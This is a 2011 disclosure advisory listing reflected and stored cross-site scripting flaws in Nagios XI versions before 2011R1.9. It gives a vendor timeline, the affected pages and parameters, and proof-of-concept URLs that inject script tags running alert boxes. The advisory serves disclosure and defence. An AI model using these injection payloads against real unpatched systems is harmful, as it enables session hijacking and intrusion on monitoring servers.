0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

2011-12-19T00:00:00
ID SECURITYVULNS:DOC:27460
Type securityvulns
Reporter Securityvulns
Modified 2011-12-19T00:00:00

Description

================ Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

Description:

Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this list is non-exhaustive, due to the sheer number of issues. Of particular note is XSS on the login page, and the ability to pass XSS through the login page, using the redirect parameter, e.g. http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>

Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)

================ Timeline: ================

16 November 2011 - Reported to Nagios Enterprises 16 November 2011 - Acknowledged 13 December 2011 - Nagios XI 2011R1.9 released 16 December 2011 - Nagios Enterprises report fixed 16 December 2011 - Public disclosure

================ Details: ================

Reflected XSS

Page: /nagiosxi/login.php Variables: - PoCs: http://site/nagiosxi/login.php/";alert('0a29');" Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe manner Also affects: /nagiosxi/about/index.php /nagiosxi/about/index.php /nagiosxi/about/main.php /nagiosxi/account/main.php /nagiosxi/account/notifymethods.php /nagiosxi/account/notifymsgs.php /nagiosxi/account/notifyprefs.php /nagiosxi/account/testnotification.php /nagiosxi/help/index.php /nagiosxi/help/main.php /nagiosxi/includes/components/alertstream/go.php /nagiosxi/includes/components/alertstream/index.php /nagiosxi/includes/components/hypermap_replay/index.php /nagiosxi/includes/components/massacknowledge/mass_ack.php /nagiosxi/includes/components/xicore/recurringdowntime.php/ /nagiosxi/includes/components/xicore/status.php /nagiosxi/includes/components/xicore/tac.php /nagiosxi/reports/alertheatmap.php /nagiosxi/reports/availability.php /nagiosxi/reports/eventlog.php /nagiosxi/reports/histogram.php /nagiosxi/reports/index.php /nagiosxi/reports/myreports.php /nagiosxi/reports/nagioscorereports.php /nagiosxi/reports/notifications.php /nagiosxi/reports/statehistory.php /nagiosxi/reports/topalertproducers.php /nagiosxi/views/index.php /nagiosxi/views/main.php

Page: /nagiosxi/account/ Variables: xiwindow PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>

Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php Variables: - PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>

Page: /nagiosxi/includes/components/xicore/status.php Variables: hostgroup, style PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script> http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>

Page: /nagiosxi/includes/components/xicore/recurringdowntime.php Variables: - PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>

Page: /nagiosxi/reports/alertheatmap.php Variables: height, host, service, width PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>

Page: /nagiosxi/reports/histogram.php Variable: service PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>

Page: /nagiosxi/reports/notifications.php Variables: host, service PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>

Page: /nagiosxi/reports/statehistory.php Variables: host, service PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>

Stored XSS

Page: /nagiosxi/reports/myreports.php Variable: title Details: It is possible to store XSS within 'My Reports', however it is believed this is only viewable by the logged-in user. 1) View a report and save it, e.g. http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D 2) Name the report with XSS, e.g. "><script>alert("0a29")</script>